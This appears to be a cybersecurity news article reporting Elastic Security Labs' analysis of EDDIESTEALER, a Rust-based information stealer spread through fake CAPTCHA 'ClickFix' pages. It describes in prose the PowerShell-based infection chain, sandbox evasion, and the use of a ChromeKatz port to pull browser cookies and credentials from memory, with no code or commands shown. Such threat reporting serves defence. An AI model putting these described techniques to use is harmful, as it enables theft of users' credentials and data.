EDDIESTEALER Malware Bypasses Chrome’s Encryption to Steal Browser Data

Published:

spot_img

New Malware Campaign: The Rise of EDDIESTEALER

A recent cybersecurity report has unveiled a concerning trend involving a new malware campaign that disseminates a Rust-based information stealer called EDDIESTEALER. The attack utilizes well-known social engineering techniques, notably a method known as ClickFix, which revolves around deceptive CAPTCHA verification pages designed to trick unsuspecting users.

How the Attack Works

Experts from Elastic Security Labs, notably researcher Jia Yu Chan, have detailed the mechanics behind this sophisticated campaign. Initially, attackers compromise legitimate websites by embedding malicious JavaScript payloads within them. These compromised sites present fake CAPTCHA verification pages, prompting victims to confirm their identity by following an outlined process.

Victims are instructed to open the Windows Run dialog, where they paste a command that executes an obfuscated PowerShell script. This script retrieves a subsequent payload from a specified external server, marking the beginning of a chain that serves to install the EDDIESTEALER malware on the victim’s system.

The Payload Delivery Process

Once the PowerShell command is executed, a JavaScript file named gverify.js is downloaded to the victim’s Downloads folder. This script runs silently in a hidden window, fetching the EDDIESTEALER binary from the same remote server and assigning it a randomly generated 12-character filename.

EDDIESTEALER is designed to gather a wide range of system data. It can communicate with a command-and-control (C2) server, collecting sensitive information from the infected device. Targets for data exfiltration include cryptocurrency wallets, web browsers, password managers, FTP clients, and messaging applications.

Techniques Employed by the Malware

Elastic points out that EDDIESTEALER employs several advanced techniques to enhance its effectiveness and evade detection. The malware utilizes string encryption and a custom WinAPI lookup mechanism for API calls. Additionally, it creates a mutex to ensure that only one instance of the malware operates at any time.

It includes checks to determine whether it’s running in a sandboxed environment, and if it detects such conditions, it deletes itself from the disk, minimizing the risk of detection.

Handling Sensitive Data

One of the more concerning features of EDDIESTEALER is its ability to bypass Chrominium’s application-level encryption to access unencrypted sensitive data. By using a Rust version of ChromeKatz, an open-source tool, the malware can extract cookies and credentials from memory, even spawning a new Chrome instance when necessary. This new instance is positioned off-screen, remaining invisible to the user while it gathers sensitive data from the target’s browser.

Recent Developments

Recently, new iterations of EDDIESTEALER have surfaced with additional functionalities, such as the ability to harvest more detailed system information, including CPU details and GPU specifications. These enhanced features allow the malware to transmit host data to the C2 server proactively before executing specific commands.

Notably, the communication between the malware and the server is fortified by a hardcoded encryption key, mitigating risks associated with potential server-side exposure.

Broader Impact

The emergence of EDDIESTEALER coincides with a wave of new stealer malware families, including Katz Stealer and the AppleProcessHub Stealer. While EDDIESTEALER focuses on Windows systems, the AppleProcessHub Stealer is designed specifically for macOS environments, capable of harvesting a variety of user data like GitHub configurations and iCloud Keychain entries.

Recent reports highlight the attackers’ use of obfuscated JavaScript files that can trigger PowerShell scripts for malware installation. For macOS users, the campaign incorporates additional steps where the Terminal is initiated to execute shell scripts that ultimately lead to data theft.

These developments emphasize a growing sophistication in malware distribution techniques, consolidating the need for users and organizations to maintain robust cybersecurity practices to safeguard sensitive information.


As this narrative unfolds, it’s clear that staying informed about evolving threats like EDDIESTEALER is crucial for effective defense against increasingly sophisticated cyber threats. By understanding how these attacks are executed, users can better protect themselves against potential breaches.

spot_img

Related articles

Recent articles

Medal Ceremony for ECOWAS 9th Nigerian Contingent in The Gambia

NIGCOY 9 Awarded ECOWAS Peace Medal for Service in The Gambia Deployment of NIGCOY 9 On June 26, 2024, the 9th Nigerian Company (NIGCOY 9) became...

Water Curse Launches Multi-Stage Malware Campaign Using 76 GitHub Accounts

Water Curse: A Multi-Stage Malware Campaign Uncovered Cybersecurity experts have recently unveiled a previously unrecognized threat actor, known as Water Curse, that exploits GitHub repositories...

Archetyp Dark Web Market Shut Down; Administrator Arrested in Spain

Major Takedown of Archetyp Market: A Blow to Dark Web Drug Trade Overview of Operation Deep Sentinel European law enforcement agencies have successfully dismantled Archetyp Market,...

Critical Linux Vulnerabilities Allow Full Root Access Through PAM and Udisks in Key Distributions

Serious Vulnerabilities Found in Linux PAM: What You Need to Know Cybersecurity researchers have identified significant local privilege escalation (LPE) vulnerabilities that pose a serious...